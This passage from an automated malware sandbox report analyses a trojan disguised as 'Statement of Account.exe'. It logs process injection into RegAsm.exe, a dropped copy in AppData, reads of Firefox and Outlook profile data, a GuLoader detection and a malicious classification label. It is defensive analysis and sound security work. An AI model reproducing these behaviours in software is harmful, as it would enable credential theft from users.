            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B9CA09_2_1D7B9CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B5E689_2_1D7B5E68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B1A479_2_1D7B1A47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B24B89_2_1D7B24B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E275E089_2_1E275E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E274ACC9_2_1E274ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E275D209_2_1E275D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E276AF19_2_1E276AF1
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 14_2_00143DFE14_2_00143DFE
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 16_2_000D3DFE16_2_000D3DFE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: String function: 0040177E appears 94 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 01286A80 appears 52 times
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 98%
            Source: Statement of Account.exe, 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
            Source: Statement of Account.exe, 00000001.00000002.47854997401.0000000002AC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameedderfu.exeFE2X vs Statement of Account.exe
            Source: Statement of Account.exeBinary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
            Source: Statement of Account.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
            Source: Statement of Account.exeReversingLabs: Detection: 23%
            Source: Statement of Account.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Statement of Account.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account.exe 'C:\Users\user\Desktop\Statement of Account.exe'
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\DnDcRJump to behavior
            Source: classification engineClassification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
            Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_00404E6E push esp; retf 1_2_00404E8E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_00407C85 push C8F569B9h; ret <